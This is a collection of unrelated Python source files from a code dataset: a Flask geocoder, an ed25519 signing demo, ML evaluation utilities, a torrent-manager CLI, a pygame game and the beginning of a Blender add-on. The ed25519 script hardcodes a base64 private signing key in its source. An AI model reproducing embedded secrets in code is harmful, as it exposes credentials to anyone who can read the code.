{"seq_id":"519120327","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@File : global_abspath.py\n@Time : 2020-11-12 9:32\n@Author : yang_dang\n@Contact : 664720125@qq.com\n@Version : 1.0\n@Description : Get the project path; this file must be placed in the project root directory\n\"\"\"\nimport os\n\n\ndef get_abspath(path):\n \"\"\"\n Build an absolute path: takes a file name or a relative path; returns None if the path is invalid\n \"\"\"\n if os.path.exists(path):\n return os.path.abspath(path)\n else:\n path = os.path.abspath(os.path.dirname(__file__) + os.sep + path)\n if os.path.exists(path):\n return path\n else:\n return None\n\n\n","sub_path":"global_abspath.py","file_name":"global_abspath.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"155826782","text":"#! /usr/bin/env python3\n# backend.py - Backend of Geocoder App that is built via flask.\nfrom flask import Flask, render_template, request, send_file, Response\nfrom werkzeug import secure_filename\nfrom latlon import handleUpload\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/uploaded', methods=['POST'])\ndef uploaded():\n global upload\n if(request.method=='POST'):\n upload = request.files['file']\n extension = upload.filename[-4:]\n # Check if it's a CSV file, otherwise tell the user.\n if(extension == '.csv'):\n newfilename = secure_filename('uploaded' + upload.filename)\n upload.save(newfilename)\n handleUpload.readfile(newfilename)\n # Check if file contains an Address column, otherwise tell user.\n if(handleUpload.containsAddress()==True):\n handleUpload.addingLatLon()\n handleUpload.newCSV()\n return render_template('index.html', btn='download.html', content=handleUpload.render())\n else:\n return render_template('index.html', text='The file you uploaded either does\\\n not have a column named \"Address\", \"address\", or possibly contains both. \\\n Please upload a file containing only 1 \"address\" or \"Address\" column.')\n else:\n return render_template('index.html', text='The file you uploaded\\\n is not a CSV file. 
Please reupload with a CSV file.')\n\n@app.route('/download')\ndef download():\n return send_file('yourfile.csv',\n attachment_filename='yourfile.csv',\n as_attachment=True)\n\nif __name__ == '__main__':\n #app.debug=True\n app.run()\n","sub_path":"Geocoder_App/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"644897442","text":"import os \n\ntry:\n with open('freepngimg/freepngimg_report.csv', 'w') as file:\n file.write('link,home_page,category,child_category,count\\n')\n for cat_dir in os.listdir('freepngimg'):\n for child_cat_dir in os.listdir('freepngimg/{}'.format(cat_dir)):\n lines = [line.strip() for line in open('freepngimg/{}/{}/links.txt'.format(cat_dir, child_cat_dir), 'r') if len(line) > 0]\n nbr_img_link = len(lines)\n file.write('https://www.freepngimg.com/{}/{},freepngimg.com,{},{},{}\\n'.format(cat_dir, child_cat_dir, cat_dir, child_cat_dir, nbr_img_link))\n\nexcept:\n print(cat_dir)\n","sub_path":"export_report.py","file_name":"export_report.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"633467220","text":"#!coding:utf8\r\n\r\n#author:yqq\r\n#date:2020/5/21 0021 10:42\r\n#description:\r\nimport json\r\nimport time\r\n\r\nfrom ed25519 import SigningKey, VerifyingKey\r\n\r\n\r\n\r\n\r\ndef sign_msg(sign_key : str, msg : bytes) -> any:\r\n sk = SigningKey(sk_s=sign_key.encode('latin1'), prefix='', encoding='base64')\r\n sig = sk.sign(msg=msg, prefix='', encoding='base64')\r\n return sig\r\n\r\n\r\ndef verify_sig(verify_key : str, sig : str, msg : bytes) -> bool:\r\n vk = VerifyingKey(vk_s=verify_key, prefix='', encoding='base64')\r\n try:\r\n vk.verify(sig=sig, msg=msg, prefix='', encoding='base64')\r\n except Exception as e:\r\n return False\r\n return True\r\n\r\n\r\n\r\n#\r\n# def create_sign_msg(method, url, timestamp, body):\r\n# params_list = [method, url, timestamp]\r\n#\r\n# if method == \"POST\":\r\n# sorted_body = sorted(body.items(), key=lambda d: d[0], reverse=False)\r\n# print(\"sorted_body= \", sorted_body)\r\n#\r\n# data_list = []\r\n# for data in sorted_body:\r\n# if isinstance(data[1], list):\r\n# value = \"[\" + \" \".join(data[1]) + \"]\"\r\n# key = data[0]\r\n# data_list.append(key + \"=\" + value)\r\n# else:\r\n# data_list.append(\"=\".join(data))\r\n#\r\n# body_params = \"&\".join(data_list)\r\n# params_list.append(body_params)\r\n#\r\n# params_str = \"|\".join(params_list)\r\n# print(\"params_str= \", params_str)\r\n# return params_str\r\n\r\n\r\ndef main():\r\n ASCCI_VERIFY_KEY = 'WSWAZBS2jty72O5x/2DOTevGwfhPvmXWpclzGWp6M0E'\r\n ASCCI_SING_KEY = 'n6R1lfDJe5ipiy5KPItTXbMIEu2htV48H0pjPqDgw8A'\r\n\r\n\r\n # msg = '{\"err_code\": 0, \"err_msg\": null, \"timestamp\": 1590026959936, \"data\": {\"serial_id\": \"202005211009196209625\", \"order_id\": \"73465774472360\"}}'\r\n\r\n\r\n data = {\r\n \"pro_id\": 3,\r\n \"serial_id\": \"202005181831579041211\"\r\n }\r\n\r\n jdata = json.dumps(data, separators=(',',':'), sort_keys=True) #按照key字母顺序排序\r\n\r\n #'1590040704197'\r\n timestamp = '1590040704197' #str(int(time.time() * 1000))\r\n # method = 'POST'\r\n url = 'querywithdraworder'\r\n\r\n param = '|'.join([timestamp, url,jdata])\r\n print(param)\r\n\r\n msg = param.encode('utf8')\r\n sig = sign_msg(sign_key=ASCCI_SING_KEY, msg=msg)\r\n print(f'sig:{sig}')\r\n if verify_sig(verify_key=ASCCI_VERIFY_KEY, sig=sig, msg=msg):\r\n 
print('verify ok')\r\n else:\r\n print('verify failed')\r\n\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n main()","sub_path":"Python3/Tornado/apps/pg/PG_Deposit/src/lib/my_apiauth/my_ed25519.py","file_name":"my_ed25519.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"305261674","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom tfsnippet.trainer import merge_feed_dict\nfrom tfsnippet.utils import get_default_session_or_error\n\n__all__ = ['collect_outputs', 'plot_2d_log_p', 'ClusteringClassifier']\n\n\ndef collect_outputs(outputs, inputs, data_flow, feed_dict=None, session=None):\n \"\"\"\n Run TensorFlow graph by mini-batch and concat outputs from each batch.\n\n Args:\n outputs (Iterable[tf.Tensor]): Output tensors to be computed.\n inputs (Iterable[tf.Tensor]): Input placeholders.\n data_flow (DataFlow): Data flow to feed the input placeholders.\n feed_dict: Optional, additional feed dict.\n session: The TensorFlow session. If not specified, use the\n default session.\n\n Returns:\n tuple[np.ndarray]: The concatenated outputs.\n \"\"\"\n outputs = list(outputs)\n inputs = list(inputs)\n session = session or get_default_session_or_error()\n\n collected = [[] for _ in range(len(outputs))]\n for batch in data_flow:\n batch_feed_dict = merge_feed_dict(\n feed_dict,\n {k: v for (k, v) in zip(inputs, batch)}\n )\n for i, o in enumerate(session.run(outputs, feed_dict=batch_feed_dict)):\n collected[i].append(o)\n\n for i, batches in enumerate(collected):\n collected[i] = np.concatenate(batches, axis=0)\n return tuple(collected)\n\n\ndef plot_2d_log_p(x, log_p, cmap='jet', **kwargs):\n \"\"\"\n Plot :math:`log p(x)` for 2-d `x`.\n\n Args:\n x: 3-d Tensor of shape (?, ?, 2).\n log_p: 2-d Tensor of shape (?, ?), i.e., x.shape[:2].\n cmap: The color map for plotting :math:`log p(x)`. 
(default \"jet\")\n \\**kwargs: Additional named arguments passed to ``plt.figure``.\n\n Returns:\n plt.Figure: The plotted figure.\n \"\"\"\n x = np.asarray(x)\n if not len(x.shape) == 3 or x.shape[2] != 2:\n raise ValueError('The shape of `x` must be (?, ?, 2), got {!r}'.\n format(x.shape))\n log_p = np.asarray(log_p)\n if log_p.shape != x.shape[:2]:\n raise ValueError('The shape of `log_p` must be x.shape[:2], got {!r}'.\n format(log_p.shape))\n\n fig = plt.figure(**kwargs)\n cmap = plt.get_cmap(cmap)\n z = np.exp(log_p)\n h = plt.pcolormesh(x[:, :, 0], x[:, :, 1], z[:-1, :-1], cmap=cmap)\n plt.colorbar(h)\n return fig\n\n\nclass ClusteringClassifier(object):\n \"\"\"\n Un-supervised classifier based on clustering algorithm.\n\n The performance of a clustering algorithm can be evaluated by the\n proxy of its classification performance, once given true class labels.\n \"\"\"\n\n def __init__(self, n_clusters, n_classes):\n \"\"\"\n Construct a new :class:`ClusteringClassifier`.\n\n Args:\n n_clusters (int): Number of clusters.\n n_classes (int): Number of classes.\n \"\"\"\n self.n_clusters = n_clusters\n self.n_classes = n_classes\n self.cluster_probs = np.zeros([n_clusters])\n self.cluster_class_probs = np.zeros([n_clusters, n_classes])\n self.cluster_classes = np.ones([n_clusters], dtype=np.int32) * -1\n self._A = np.identity(n_clusters, dtype=np.float32)\n self._B = np.identity(n_clusters * n_classes, dtype=np.float32)\n\n def describe(self):\n \"\"\"\n Describe the clustering classifier.\n\n Returns:\n str: Description of the classifier.\n \"\"\"\n ret = [\n 'Cluster probs: [{}]'.format(\n ', '.join('{:.4g}'.format(p) for p in self.cluster_probs)),\n 'Cluster labels: {}'.format(self.cluster_classes.tolist()),\n 'Cluster label probs:'\n ]\n for i, label_prob in enumerate(self.cluster_class_probs):\n ret.append(' {}: [{}]'.format(\n i, ', '.join('{:.4g}'.format(p) for p in label_prob)))\n return '\\n'.join(ret)\n\n def fit(self, c_pred, y_true):\n \"\"\"\n Fit the clustering based classifier.\n\n Args:\n c_pred (np.ndarray): 1-d array, the predicted cluster indices.\n y_true (np.ndarray): 1-d array, the true class labels.\n \"\"\"\n c_pred = np.asarray(c_pred)\n y_true = np.asarray(y_true)\n if len(c_pred.shape) != 1:\n raise ValueError('`c_pred` must be 1-d array.')\n if y_true.shape != c_pred.shape:\n raise ValueError('The shape of `y_true` must be equal to '\n 'that of `c_pred`.')\n self.cluster_probs = np.mean(self._A[c_pred], axis=0)\n class_probs = np.sum(self._B[c_pred * self.n_classes + y_true], axis=0)\n class_probs = class_probs.reshape([self.n_clusters, self.n_classes])\n class_probs = class_probs / np.maximum(\n np.sum(class_probs, axis=-1, keepdims=True), 1)\n self.cluster_class_probs = class_probs\n self.cluster_classes = np.argmax(class_probs, axis=-1)\n\n def predict(self, c_pred):\n \"\"\"\n Predict the most likely label.\n\n Args:\n c_pred (np.ndarray): 1-d array, the predicted cluster indices.\n\n Returns:\n np.ndarray: 1-d array, the predicted class labels.\n \"\"\"\n c_pred = np.asarray(c_pred)\n if len(c_pred.shape) != 1:\n raise ValueError('`c_pred` must be 1-d array.')\n return self.cluster_classes[c_pred]\n","sub_path":"tfsnippet/examples/utils/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"641838744","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, absolute_import\nfrom sqlalchemy import 
create_engine\nfrom tranny.app import Base\n\n__author__ = \"Leigh MacDonald \"\n__license__ = \"BSD 3-Clause\"\n__copyright__ = \"Copyright (c) 2013-2014 Leigh MacDonald\"\n__version__ = '0.0.1'\n\nimport argparse\nimport logging\n\n\ndef parse_args(args=None):\n \"\"\" Parse command line argument and launch the appropriate command specifid\n by the user input\n \"\"\"\n\n def cmd_start(options):\n import gevent\n import signal\n from tranny.manager import ServiceManager\n\n gevent.signal(signal.SIGQUIT, gevent.kill)\n\n application = ServiceManager()\n application.start()\n\n def cmd_db_drop(options):\n from tranny.datastore import db_drop\n\n db_drop()\n\n def cmd_db_init(options):\n from tranny.datastore import db_drop, db_init\n\n db_init(username=options.username, password=options.password, wipe=options.wipe)\n\n def cmd_cache_clear(options):\n from tranny import cache\n\n cache.invalidate()\n\n def cmd_imdb(options):\n from tranny.service import imdb\n imdb.load_sql(options.nodownload)\n\n def cmd_geoip(options):\n from tranny.service import geoip\n from tranny.app import Session\n from tranny.app import config\n\n engine = create_engine(config.get_db_uri())\n Session.configure(bind=engine)\n Base.metadata.create_all(bind=engine)\n\n db_file_path = geoip.fetch_update(download=options.nodownload)\n geoip.update(Session(), db_file_path)\n\n parser = argparse.ArgumentParser(prog=\"tranny-cli.py\", description=\"Tranny torrent management system\")\n parser.add_argument(\"-c\", \"--config\", help=\"Specify alternate config path\", default=False)\n parser.add_argument(\"-l\", \"--loglevel\", help=\"Set logging level\", default=False)\n\n subparsers = parser.add_subparsers(help=\"Command help\")\n\n db_init = subparsers.add_parser(\"db_init\", help=\"Initialize the database schema\")\n db_init.add_argument(\"-u\", \"--username\", help=\"Admin username\", default=\"admin\")\n db_init.add_argument(\"-p\", \"--password\", help=\"Admin password\", default=\"tranny\")\n db_init.add_argument(\"-w\", \"--wipe\", help=\"Wipe any existing database\", action=\"store_true\")\n db_init.set_defaults(func=cmd_db_init)\n\n db_drop = subparsers.add_parser(\"db_drop\", help=\"Drop (delete) the existing database. This is non-reversible.\")\n db_drop.set_defaults(func=cmd_db_drop)\n\n run = subparsers.add_parser(\"run\", help=\"Run the application\")\n run.add_argument(\"-H\", \"--host\", help=\"WebUI host to bind to\", default=\"admin\")\n run.add_argument(\"-P\", \"--port\", help=\"WebUI port to bind to\", default=\"tranny\")\n run.set_defaults(func=cmd_start)\n\n # aliases=['cc'] (requires 3.2+)\n cache_clear = subparsers.add_parser(\"cache_clear\", help=\"Clear the application cache\")\n cache_clear.set_defaults(func=cmd_cache_clear)\n\n imdb = subparsers.add_parser(\n \"imdb\",\n help=\"Load and manage the imdb SQL database (warn: This can take 1-10 hrs to complete\"\n )\n imdb.add_argument(\"-n\", \"--nodownload\",\n help=\"Do not download the datasets before loading (assumes existing data)\",\n action=\"store_false\")\n imdb.set_defaults(func=cmd_imdb)\n\n geoip = subparsers.add_parser(\"geoip\", help=\"Load and manage the geoip database\")\n geoip.add_argument(\"-n\", \"--nodownload\",\n help=\"Do not download the datasets before loading (assumes existing data)\",\n action=\"store_false\")\n geoip.set_defaults(func=cmd_geoip)\n\n return parser.parse_args(args=args)\n\n\ndef main():\n \"\"\" Main entry point for the application. 
Runs the command parsed from the CLI\n using the argparse func system\n \"\"\"\n # Exception raised on exit due to threading module loading before gevent\n # This preemptive patching prevents this\n # see: http://stackoverflow.com/questions/8774958/keyerror-in-module-threading-after-a-successful-py-test-run\n import sys\n\n if 'threading' in sys.modules:\n del sys.modules['threading']\n import gevent\n import gevent.monkey\n\n gevent.monkey.patch_all()\n\n # Setup logger & config\n from tranny.app import config\n # Execute the user command\n arguments = parse_args()\n\n try:\n if arguments.loglevel:\n log_level = arguments.loglevel.upper()\n elif config.has_option(\"log\", \"level\"):\n log_level = config.get_default(\"log\", \"level\")\n else:\n log_level = \"INFO\"\n log_fmt = config.get_default(\"log\", \"format\", \"%(levelname)s %(asctime)s %(name)s: %(message)s\")\n logging.basicConfig(level=logging.getLevelName(log_level), format=log_fmt)\n\n if arguments.config:\n config.initialize(arguments.config)\n arguments.func(arguments)\n except Exception:\n logging.exception(\"Fatal error, cannot start!\")\n sys.exit(1)\n else:\n sys.exit(0)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tranny/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"60665560","text":"from datetime import datetime\n\nfrom pandas._testing import assert_frame_equal\n\nfrom forecast.cross_validate import (\n cross_validate,\n build_design_matrix,\n evaluate_features,\n)\nfrom sklearn.linear_model import LinearRegression\nimport pandas as pd\nimport numpy as np\n\n\ndef test_build_design_matrix(test_input_df, test_design_df):\n actual_design_df = build_design_matrix(\n test_input_df,\n date_col=\"date\",\n var_col=\"GDP\",\n horizon=1,\n start_date=\"2019-12-01\",\n end_date=\"2020-11-01\",\n )\n assert_frame_equal(actual_design_df, test_design_df)\n\n\ndef test_cross_validate(test_design_df, test_result_df):\n lr = LinearRegression()\n actual_result = cross_validate(\n test_design_df,\n date_col=\"date\",\n feature_cols=[\"feature\", \"GDP_lag\"],\n target_col=\"GDP_forecast\",\n estimator=lr,\n window=3,\n period=1,\n horizon=1,\n )\n assert_frame_equal(actual_result, test_result_df)\n\n\ndef test_evaluate_features(test_input_df, test_design_df, test_result_df):\n lr = LinearRegression()\n actual_design, actual_result = evaluate_features(\n test_input_df,\n date_col=\"date\",\n var_col=\"GDP\",\n horizon=1,\n estimator=lr,\n window=3,\n period=1,\n return_model=False,\n start_date=\"2019-12-01\",\n end_date=\"2020-11-01\",\n )\n assert_frame_equal(actual_result, test_result_df)\n assert_frame_equal(actual_design, test_design_df)\n","sub_path":"tests/test_cross_validate.py","file_name":"test_cross_validate.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"459322122","text":"#importing pygame and initializing game as well\nimport pygame\npygame.init()\n#importing time, random and math function\nimport time \nimport random\nimport math\n#setting the size of the window, setting the caption and starting the \"time\" start on the game\nscreen = pygame.display.set_mode((500, 500))\npygame.display.set_caption('CATCH CHARLIE, ASAP!!!')\nclock = pygame.time.Clock()\n\n#uploading all my images\nbackground_image = pygame.image.load('images/neighstreet.jpg').convert_alpha()\nAli_image = 
pygame.image.load('images/ali.png').convert_alpha()\ncharlie_image = pygame.image.load('images/charlie.png').convert_alpha()\ncar_image = pygame.image.load('images/redcar.png'). convert_alpha()\n#reconstructing my background image\nbackground_image = pygame.image.load('images/neighstreet.jpg')\nbackground_image = pygame.transform.scale(background_image, (500, 500))\n#reconstructing ali image\nAli_image = pygame.image.load('images/ali.png')\nAli_image = pygame.transform.scale(Ali_image, (68, 185))\n#reconstructing charlie image\ncharlie_image = pygame.image.load('images/charlie.png')\ncharlie_image = pygame.transform.scale(charlie_image, (70, 120))\n#reconstructing car image\ncar_image = pygame.image.load('images/redcar.png')\ncar_image = pygame.transform.scale(car_image, (70, 120))\n\n###if player wins, a func that will called later, play this horrible music :(\nplayer_wins = pygame.mixer.Sound ('sounds/win.wav')\n###loading it to my code\npygame.mixer.music.load('sounds/music.wav')\n#unfortuntely play this music\n##well you lost so (variable will be used later on)...\nlose_sound = pygame.mixer.Sound ('sounds/lose.wav')\npygame.mixer.music.play()\n\nclass Ali:\n def __init__ (self, width, height):\n self.timer = 0\n self.direction = 2\n self.x = width/2\n self.y = height/2\n self.caught = False\n def change_direction(self, width, height, xlane, ylane):\n #this took a tremendous amount of playing with since i have funny sizes for my images\n #if Ali's width + 125 pixels is greater than the width of the gaming window,\n #then width is equal to width minus -125. thus essentially never letting it be equal to\n #anything greater than the 500/500 window. \n if self.x + 125 > width:\n self.x = width - 125\n #else/if the Ali's width is less than 0 on the x-axis then it equals to zero, meaning\n #hero cannot go beyond the 0 point on the x axis\n elif self.x < 0:\n self.x = 0\n #if Ali's height is less than 0 on the y-axis then continue to keep it equal to zero, aka\n #the hero cannot go beyond the 0 point on the y axis\n if self.y < 0:\n self.y = 0\n #else/if Ali's height + 200 is greater than the height of the window, then\n #ensure her new position never exceeds the furthest point on the y axis\n elif self.y + 200 > height:\n self.y = height - 200\n #giving ability to move in all direction, this will be keyed in later\n ###if on the yaxis and going up, then on the xaxis add some opposite direction,\n if ylane == 0:\n self.y = self.y - self.direction\n ###if on the yaxis and going down, then on the xaxis add some opposite direction\n elif ylane == 1:\n self.y = self.y + self.direction\n ####if on the xaxis and going up, then on the yaxis and some opposite direction\n if xlane == 0:\n self.x = self.x + self.direction\n ####if on the xaxis and going down, then on the yaxis add some direction(opposite)\n elif xlane == 1:\n self.x = self.x - self.direction\nclass Protagonist:\n def __init__ (self, width, height):\n self.xlane = random.randint(0, 1)\n self.ylane = random.randint(0, 1)\n self.timer = 2\n self.direction = 3\n self.x = width\n self.y = height\n self.caught = False\n\n def change_direction(self, width, height):\n #*****CHARLIE/PROTAG MOVES RIGHT****** \n self.x += -2\n if self.x < 0:\n self.x = 500\n #*****CHARLIE/PROTAG MOVES LEFT*******\n self.x += 2\n if self.x > 500:\n self.x = 0\n #*****CHARLIE/PROTAG MOVES UP********\n self.y += -2\n if self.y < 0:\n self.y = 500\n #******CHARLIE/PROTAG MOVES DOWN******\n self.y += 2\n if self.y > 500:\n self.y = 0\n #********activates the 
movement#######\n ####if on the xaxis and going up, then on the yaxis and some opposite direction\n if self.xlane == 0:\n self.y = self.y + self.direction \n ####if on the xaxis and going down, then on the yaxis add some direction(opposite)\n elif self.xlane == 1:\n self.y = self.y - self.direction\n ###if on the yaxis and going up, then on the xaxis add some opposite direction\n if self.ylane == 0:\n self.x = self.x - self.direction\n ###if on the yaxis and going down, then on the xaxis add some opposite direction\n elif self.ylane == 1:\n self.x = self.x + self.direction\n \n\nclass Charlie(Protagonist):\n pass\nclass Cars(Protagonist):\n pass\n\ndef main():\n ###Could have set it to classic 500,500 but i felt like my background image really needed more space\n width = 550\n height = 550\n\n ###instead of calling my classes I can use this instead. creating them as variables.\n charlie = Protagonist(width, height)\n player = Ali(width, height)\n car1 = Protagonist(width, height)\n car2 = Protagonist(width, height)\n car3 = Protagonist(width, height)\n ###setting the font, and asking if they want to chase the pup again in white\n f = pygame.font.Font(None, 30)\n surf = f.render(\"Drop the leash?PRESS RETURN\", 10, (255, 255, 255))\n surf_losegame = f.render(\"Try again? PRESS RETURN.\", 1, (255,255,255))\n \n\n\n ####Game logic, while stop_game is equal to false......\n stop_game = False\n ##while the game has not stopped\n while not stop_game:\n ##calling the function from earlier, to change direction, i also edited\n ###the images at the top of the code to set their visual height in the game\n charlie.change_direction(width, height)\n car1.change_direction(width, height)\n car2.change_direction(width, height)\n car3.change_direction(width, height)\n ###must run this for events, (aka, anytime user pushes anything)\n for event in pygame.event.get():\n ###the game will only quit once stop_game is equal to true (with closing the tab)\n if event.type == pygame.QUIT:\n stop_game = True\n #basically just establishing a starting position \n xlane = 4\n ylane = 4\n #if right key gets pressed move in the 0 direction aka xaxis\n key = pygame.key.get_pressed()\n if key [pygame.K_RIGHT]: \n xlane = 0\n #if the left key gets pressed mmove in the 1 directoin aka xaxis\n if key [pygame.K_LEFT]:\n xlane = 1\n #if the up key gets pressed move it up on the yaxis\n if key [pygame.K_UP]:\n ylane = 0\n #if the down key get's pressed move it down on the yaxis\n if key [pygame.K_DOWN]:\n ylane = 1\n ###using this incredible formula to calcuate distance on step 14\n ###given that an image is 32 pixels, mine are not and I had to play with this\n ###i made the formula relevent to 50 pixels because i was using large photos\n if math.sqrt((player.x - charlie.x)**2 + (player.y - charlie.y)**2) <= 60:\n charlie.caught = True \n player_wins.play()\n if math.sqrt((player.x - car1.x)**2 + (player.y - car1.y)**2) <= 90:\n player.caught = True\n lose_sound.play()\n if math.sqrt((player.x - car2.x)**2 + (player.y - car2.y)**2) <= 90:\n player.caught = True\n lose_sound.play()\n if math.sqrt((player.x - car3.x)**2 + (player.y - car3.y)**2) <= 90:\n player.caught = True\n lose_sound.play()\n\n ###if key return gets pressed, (after charlie get's caught of course )\n if key [pygame.K_RETURN] and charlie.caught:\n charlie.caught = False #now it would reset that charlie is not caught.......\n ####and send charlie back to random-ville\n charlie.x = random.randint(0, width)\n charlie.y = random.randint(0, height)\n if key 
[pygame.K_RETURN] and (player.caught or car1.caught or car2.caught or car3.caught):\n            player.caught = False\n            #charlie.caught = False\n            charlie.x = random.randint(0, width)\n            charlie.y = random.randint(0, height)\n        \n        ###just calling the function for the player, aka ali, get to steppin' \n        player.change_direction(width, height, xlane, ylane)\n        #####drawing the background, setting the background image\n        screen.blit(background_image, [0, 0])\n        if not player.caught:\n            screen.blit(Ali_image, [player.x, player.y])\n        if player.caught:\n            screen.blit(surf_losegame, [width/7, height/2])\n        ###drawing ali in to the mix, i believe the rest is confirming the x and y axis of the images\n        #screen.blit(Ali_image, [player.x, player.y])\n        screen.blit(car_image, [car1.x, car1.y])\n        screen.blit(car_image, [car2.x, car2.y])\n        screen.blit(car_image, [car3.x, car3.y])\n        ##if charlie is not caught, let that boy run to his heart's content\n        if not charlie.caught:\n            screen.blit(charlie_image, [charlie.x, charlie.y])\n        ###if charlie is caught, boof charlie is gone for a second\n        if charlie.caught:\n            screen.blit(surf, [width/5, height/2])\n\n        # Gaming display\n        pygame.display.update()\n        charlie.timer += clock.tick(60)\n        #I know the instructions called for 2 seconds(2000), but i want it to be hard to get charlie like it was in real life.\n        if charlie.timer >= 500:\n            charlie.timer = 0\n            ###for all of the coordinates used by the protagonists, make sure they are random, range set for 0-3\n            charlie.xlane = random.randint(0, 3)\n            charlie.ylane = random.randint(0, 3)\n            car1.xlane = random.randint(0, 3)\n            car1.ylane = random.randint(0, 3)\n            car2.xlane = random.randint(0, 3)\n            car2.ylane = random.randint(0, 3)\n            car3.xlane = random.randint(0, 3)\n            car3.ylane = random.randint(0, 3)\n\n\n\n\n\n    pygame.quit()\n\nif __name__ == '__main__':\n    main()\n\n\n","sub_path":"testingpygame.py","file_name":"testingpygame.py","file_ext":"py","file_size_in_byte":10740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"647675853","text":"'''\nBEGIN GPL LICENSE BLOCK\n\nThis program is free software; you can redistribute it and/or\nmodify it under the terms of the GNU General Public License\nas published by the Free Software Foundation; either version 2\nof the License, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, write to the Free Software Foundation,\nInc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n\nEND GPL LICENCE BLOCK\n'''\n\nbl_info = {\n \"name\": \"doshape Mesh tools\",\n \"author\": \"yhoyo (Diego Quevedo\",\n \"version\": (1, 0, 1),\n \"blender\": (2, 7, 3),\n \"category\": \"Mesh\",\n \"location\": \"View3D > EditMode > ToolShelf\",\n \"wiki_url\": \"\",\n \"tracker_url\": \"\"\n}\n\n\nif \"bpy\" in locals():\n import imp\n\nimport bpy\nfrom mesh_doshape_tools.CoDEmanX_pivote import VIEW3D_OT_pivot_point_set, VIEW3D_MT_pivot_point_set\nfrom mesh_doshape_tools.origami_symbols import OBJECT_OT_add_object\nfrom mesh_doshape_tools.OrigamiPanel import opendoshapeurloperator, opendoshapeurlPanel, SeleccionarPanel, ObjetosPanel, FuncionesPanel, DoblarPanel, DoblarbPanel, MundoPanel, MarcasPanel, LineasPanel, RenderPanel, ParamodificarPanel #MaterialPanel, MaterialesPanel,\nfrom mesh_doshape_tools.lines_origami_freestyle import MontanaOperator,delMontanaOperator, delCreaseOperator, CreaseOperator\n\nfrom mesh_doshape_tools.separar_unir_caras import SeparaConectaOperator, SeparaConectaOperatorPanel\nfrom mesh_doshape_tools.join_explote import JoinExploteOperator, JoinExploteOperatorPanel\nfrom mesh_doshape_tools.mover import MoverVerticesOperator, MoverVerticesOperatorPanel\n\nfrom mesh_doshape_tools.HideShow import HideShowOperator, HideShowOperatorPanel\nfrom mesh_doshape_tools.NirenYang_mesh_edges_length_angle_yi import LengthSet, AngleSet\nfrom mesh_doshape_tools.equal_angles import angleBisectorOperator,angleBisectorOperatorPanel\n#from mesh_doshape_tools.degree_angle_bisector import DegreeBisectorOperator, DegreeBisectorOperatorPanel\nfrom mesh_doshape_tools.perpendicular_bisector import PerpendicularBisectorOperator, PerpendicularBisectorOperatorPanel\nfrom mesh_doshape_tools.perpendicular_orthocenter import PerpendicularOrthoOperator, PerpendicularOrthoOperatorPanel\nfrom mesh_doshape_tools.perpendicular_circum_center import PerpendicularCircumOperator, PerpendicularCircumOperatorPanel\nfrom mesh_doshape_tools.join_bisector import JoinBisectorOperator, JoinBisectorOperatorPanel\nfrom mesh_doshape_tools.triangle_bisector import TriangleBisectorOperator, TriangleBisectorOperatorPanel\nfrom mesh_doshape_tools.edge_length_equalizer import Edge_Equalizer_LengthOperator, Edge_Equalizer_LengthOperatorPanel\n\nfrom mesh_doshape_tools.render_save_all import Render_Save_ScenesOperator, Render_Save_ScenesOperatorPanel\n\n\ndoshape_classes = (\n\t[VIEW3D_OT_pivot_point_set, \"Operador pivote\"],\n\t[VIEW3D_MT_pivot_point_set, \"menu pivote\"],\n\t[opendoshapeurloperator, \"Operador url\"],\n\t[OBJECT_OT_add_object, \"add origami symbol\"],\n\t\n\t[opendoshapeurlPanel, \"Menu url\"],\n\t[SeleccionarPanel, \"test\"],\n\t[ObjetosPanel, \"test\"],\n\t[FuncionesPanel, \"test\"],\n\t[DoblarPanel, \"test\"],\n\t[DoblarbPanel, \"test\"],\n\t[MundoPanel, \"test\"],\n\t[MarcasPanel, \"test\"],\n\t[LineasPanel, \"test\"],\n\t[RenderPanel, \"test\"],\n\t\n\t[Render_Save_ScenesOperator, \"test\"],\n\t[Render_Save_ScenesOperatorPanel, \"test\"],\n\t\n\t#[MaterialPanel, \"test\"],\n\t#[MaterialesPanel, \"test\"],\n\t[ParamodificarPanel, \"test\"],\n\t\n\t[SeparaConectaOperator, \"separa caras operador\"],\n\t[SeparaConectaOperatorPanel, \"panel separar caras\"],\n\t\n\t[MoverVerticesOperator, \"mueve vertices 
